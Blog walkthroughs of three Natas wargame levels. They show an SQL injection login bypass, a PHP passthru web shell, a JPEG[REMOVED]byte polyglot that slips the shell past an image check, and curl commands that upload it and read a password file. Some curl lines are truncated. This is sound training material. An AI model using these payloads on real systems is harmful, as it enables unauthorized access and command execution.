        $link = mysql_connect('localhost', 'natas14', '<censored>');
        mysql_select_db('natas14', $link);
        $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
        if(array_key_exists("debug", $_GET)) {
            echo "Executing query: $query<br />";
        }
        if(mysql_num_rows(mysql_query($query, $link)) > 0) {
            echo "Successful login! The password for natas15 is <censored><br />";
        } else {
            echo "Access denied!<br />";
        }
    } else { ...

Okay, this is one of the most common errors: SQL injection. You should never build a query like this, because the attacker controls the values of $_REQUEST["username"] and $_REQUEST["password"]. We can use that to make the query return more than zero rows, which is all the code checks for.

Also, check out the nifty debugging helper: set debug and it'll output the query that gets executed, so you can see what you're doing a bit better.

  • debug: 1
  • username: natas14" or username is not null;--  (don't forget the space after the 2nd dash, it is required in MySQL)
  • password: must be set, but pick whatever you want (pwnd)

The final SQL query that'll be executed is:

SELECT * FROM users WHERE username="natas14" OR username IS NOT NULL;--  and password="pwnd"

Lessons Learned

To defend against attacks like this, don't make the mistake xkcd suggests. Escaping input is not the right approach. Instead, use parameterized queries, which are injection-proof. They also have other benefits. http://bobby-tables.com/ shows you how to use parameterized queries in a ton of different programming languages, and explains why this approach is the right one.
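For instance, with Python's sqlite3 module (any driver with placeholders works the same way; the table contents here are made up), the level-14 check becomes injection-proof:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('natas15', 's3cret')")

def login(username, password):
    # The ? placeholders send the values separately from the SQL text, so
    # user input can never change the structure of the query.
    rows = conn.execute(
        "SELECT * FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchall()
    return len(rows) > 0
```

With this version, the level-14 payload is just a strange, non-matching username: login('natas14" or username is not null;-- ', "pwnd") returns False.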

Server-side security war games: Part 13
https://hashbang.ca/2013/07/02/natas-13
Tue, 02 Jul 2013 16:31:08 +0000

This is level 13. Looks like they claim to only accept image files, in order to close the flaw we used previously. I bet we can get around that restriction just like we did when they disallowed certain characters in the search term. Let's examine the code.

Here's the new part of the code:

    if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) {
        echo "File is not an image";
    }

Let's look up the exif_imagetype function so we can figure out how to manipulate the return value:

exif_imagetype() reads the first bytes of an image and checks its signature.

Okay, so the first bytes of our payload now have to be the magic bytes to make this return true.

When a correct signature is found, the appropriate constant value will be returned otherwise the return value is FALSE.

So, we can pick any supported image type we want. Pick one from the list of supported formats and use its magic numbers like so:

    perl -E 'my $magic_numbers = "\x{ff}\x{d8}\x{ff}\x{e0}"; say $magic_numbers . q{<? passthru($_GET["cmd"]); ?>};' > shell.php

Now if we upload this, the upload code will think it is a JPG image, but since it has a .php extension, Apache will execute it as PHP and we'll be able to run our exploit as before.

curl -u natas13:password \
    -F MAX_FILE_SIZE=1000 \
    -F filename=pwnd.php \
    -F "uploadedfile=@shell.php" \
curl -u natas13:password \

What is that junk in the first 4 bytes? Remember, PHP is not a programming language, it is a templating language, so Apache outputs the magic bytes we inserted, and then the output of the PHP code it executed. So, skip the first 4 bytes of the response, and take the remainder as your password for the next level.
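In other words (a tiny illustration; the magic bytes are the JPEG signature from shell.php, and the password is a stand-in):

```python
MAGIC = b"\xff\xd8\xff\xe0"                # the JPEG signature we prepended
body = MAGIC + b"hypothetical-password\n"  # stand-in for the HTTP response

# Apache echoes the template's literal bytes first, then the PHP output,
# so the password is everything after the first 4 bytes.
password = body[4:].decode().strip()
```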

Server-side security war games: Part 12
https://hashbang.ca/2013/07/01/natas-12
Mon, 01 Jul 2013 17:23:37 +0000

In level 12, we're given a file upload form. Let's take a look at the code that processes input.

  • First, there's a genRandomString function, which, unsurprisingly, generates a random string.
  • makeRandomPath, which creates a random filename (using the extension provided)
  • makeRandomPathFromFilename takes a directory name, a filename, and parses the file extension from the filename.
  • The code checks if a file has been uploaded. If so, it creates a new path from the provided filename. Then, the size of the file is checked. If all is OK, it uploads the file, and helpfully gives us a link to the file's location.

Let's see if we can upload a file with a .php file extension. If we can do that, then Apache might actually execute it when we visit the provided location.

Notice where the file extension comes from. Instead of extracting it from the provided filename, it comes from a hidden form field called "filename". The server pre-populates that field with some_random_chars.jpg, but we can change that to whatever we want. We'll change it to something with a .php extension.

How's this for an exploit payload?

<?php
// pwnd.php, a simple remote shell
passthru($_GET["cmd"]);
?>

Pretty simple, but it'll get the job done.

After examining the file upload form, we can use curl to POST our data:

    curl -u natas12:password \
        -F MAX_FILE_SIZE=1000 \
        -F filename=pwnd.php \
        -F "uploadedfile=@shell.php" \

Now we use the URL it returned, with ?cmd=cat%20/etc/natas_webpass/natas13 as the command to execute:

    curl -u natas12:password \

The server executed our payload as PHP, ran the command, and sent the output straight back to us. You have the password for the next level!